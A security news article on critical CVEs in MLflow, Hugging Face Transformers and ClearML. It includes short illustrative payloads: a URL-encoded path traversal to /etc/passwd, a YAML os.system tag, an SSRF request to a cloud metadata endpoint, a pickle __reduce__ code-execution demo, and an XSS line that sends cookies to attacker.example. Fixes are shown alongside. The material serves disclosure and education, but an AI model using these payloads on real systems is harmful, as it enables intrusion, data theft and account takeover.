Critical Vulnerabilities Found in Open Source AI/ML Platforms

Security researchers flag multiple severe vulnerabilities in the open source AI/ML solutions MLflow, ClearML, and Hugging Face.

Over the past month, members of the Huntr bug bounty platform for artificial intelligence (AI) and machine learning (ML) have identified multiple severe vulnerabilities in popular solutions such as MLflow, ClearML, and Hugging Face.

The most severe of the identified issues are four critical flaws, each carrying a CVSS score of 10, in MLflow, a platform for streamlining ML development that offers a set of APIs for integrating with existing ML applications and libraries.

One of the issues, CVE-2023-6831, is a path traversal bug in the artifact deletion operation: the user-supplied path is validated before it is normalized, so a crafted path can pass the checks and still resolve outside the intended directory, allowing an attacker to delete any file on the server.
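
To illustrate the flaw class, here is a minimal Python sketch, not MLflow's actual code; ARTIFACT_ROOT, validate, and delete_artifact are hypothetical names. A path checked before decoding and normalization can smuggle traversal sequences past the check:

```python
import posixpath
from urllib.parse import unquote

ARTIFACT_ROOT = "/srv/mlflow/artifacts"

def validate(raw: str) -> None:
    # The check runs on the raw request string, before any decoding.
    if ".." in raw.split("/"):
        raise ValueError("path traversal detected")

def delete_artifact(raw: str) -> str:
    validate(raw)                        # 1. validate the raw path...
    decoded = unquote(raw)               # 2. ...then decode/normalize it
    target = posixpath.normpath(posixpath.join(ARTIFACT_ROOT, decoded))
    return target                        # 3. the file at `target` gets deleted

# "%2e%2e" contains no literal ".." and passes validate(), but decodes
# to ".." afterwards:
print(delete_artifact("%2e%2e/%2e%2e/%2e%2e/etc/passwd"))
# -> /etc/passwd
```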

The second vulnerability, CVE-2024-0520, exists in the mlflow.data module, where a crafted dataset can control a file path that is used without sanitization, allowing an attacker to access information or overwrite files and potentially achieve remote code execution (RCE).
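
The standard defense for this class of bug is to resolve the final path and confine it to an allowed root before any file operation. A hedged sketch of that pattern, where DATA_ROOT and safe_dataset_path are hypothetical and not part of mlflow.data's API:

```python
from pathlib import Path

DATA_ROOT = Path("/srv/mlflow/data").resolve()

def safe_dataset_path(source: str) -> Path:
    """Resolve a dataset-supplied source and refuse anything outside DATA_ROOT."""
    candidate = (DATA_ROOT / source).resolve()
    if not candidate.is_relative_to(DATA_ROOT):  # Python 3.9+
        raise ValueError(f"dataset source escapes the data root: {source}")
    return candidate

safe_dataset_path("sets/train.csv")      # OK: stays under DATA_ROOT
safe_dataset_path("../../etc/shadow")    # raises ValueError
```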

The third critical flaw, CVE-2023-6977, is described as a path validation bypass that could allow attackers to read sensitive files on the server, while the fourth, CVE-2023-6709, could lead to remote code execution when loading a malicious recipe configuration.
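
Protect AI has not published the exact recipe-loading code path, but configuration-driven RCE in Python frequently comes down to deserializing an attacker-controlled document with a loader that can construct arbitrary objects. A generic PyYAML illustration of that class, not MLflow's actual loader:

```python
import yaml

# A "recipe" document abusing PyYAML's Python-object tags (illustrative):
malicious_recipe = 'steps: !!python/object/apply:os.system ["id"]'

try:
    yaml.safe_load(malicious_recipe)   # safe_load refuses the tag
except yaml.YAMLError as exc:
    print("safe_load rejected it:", exc)

# yaml.unsafe_load (or yaml.load with yaml.Loader) would instead construct
# the object, executing `id` while the document is still being parsed:
# yaml.unsafe_load(malicious_recipe)
```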

All four vulnerabilities were resolved in MLflow 2.9.2, which also patches a high-severity server-side request forgery (SSRF) bug that could allow an attacker to access internal HTTP(S) servers and potentially achieve RCE on the victim machine.
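
In general terms, an SSRF of this kind arises when a server fetches a client-supplied URL without restricting its scheme or destination. A minimal sketch, with fetch_model_metadata as a hypothetical helper rather than MLflow's API:

```python
import requests

def fetch_model_metadata(url: str) -> bytes:
    # No allowlist and no scheme/host checks: the server requests
    # whatever URL the client supplies.
    return requests.get(url, timeout=5).content

# The attacker points the server at hosts only it can reach, such as an
# internal admin service or a cloud metadata endpoint:
fetch_model_metadata("http://169.254.169.254/latest/meta-data/")
```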

Another critical-severity flaw was identified in Hugging Face Transformers, which provides tools for building ML applications.

The issue, CVE-2023-7018, exists because a function that automatically loads vocab.pkl files from remote repositories imposes no restrictions on their contents, which could allow attackers to plant a malicious file and achieve RCE. Transformers version 4.36 resolves the vulnerability.
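
The underlying hazard is Python's pickle format itself: deserializing a pickle executes whatever callable the file specifies, so code that fetches and unpickles a remote vocab.pkl without restrictions hands its author code execution. A self-contained demonstration of the mechanism, using a harmless `id` command rather than Transformers' actual loading code:

```python
import os
import pickle

class Exploit:
    # pickle.loads() invokes __reduce__ during deserialization and calls
    # the returned callable with the given arguments.
    def __reduce__(self):
        return (os.system, ("id",))

payload = pickle.dumps(Exploit())   # what a malicious vocab.pkl would contain
pickle.loads(payload)               # "loading" the file runs `id`
```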

The members of the Huntr community also identified a high-severity stored cross-site scripting (XSS) flaw in ClearML, an end-to-end platform for automating ML experiments in a unified environment.

Tracked as CVE-2023-6778, the issue was identified in the Markdown editor component of the Project Description and Reports sections, which renders unfiltered user input, allowing the injection of malicious XSS payloads and potentially leading to user account compromise.
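
Stored XSS in a Markdown editor typically works because Markdown renderers pass inline HTML through verbatim. A hedged sketch of the payload shape and the escape-before-render fix, illustrative only and not ClearML's code:

```python
import html

# A project description carrying inline HTML; the event handler runs in
# the browser of anyone who views the rendered page:
description = '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">'

# Escaping (or sanitizing against an HTML allowlist) before rendering
# turns the markup into inert text:
print(html.escape(description))
```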

Protect AI, which has withheld the details of a critical-severity command injection bug in Paddle (CVE-2024-0521), says all the vulnerabilities were reported to the project maintainers 45 days before its report was published.

Related: NIST: No Silver Bullet Against Adversarial Machine Learning Attacks

Related: Major Organizations Using ‘Hugging Face’ AI Tools Put at Risk by Leaked API Tokens

Related: Over a Dozen Exploitable Vulnerabilities Found in AI/ML Tools
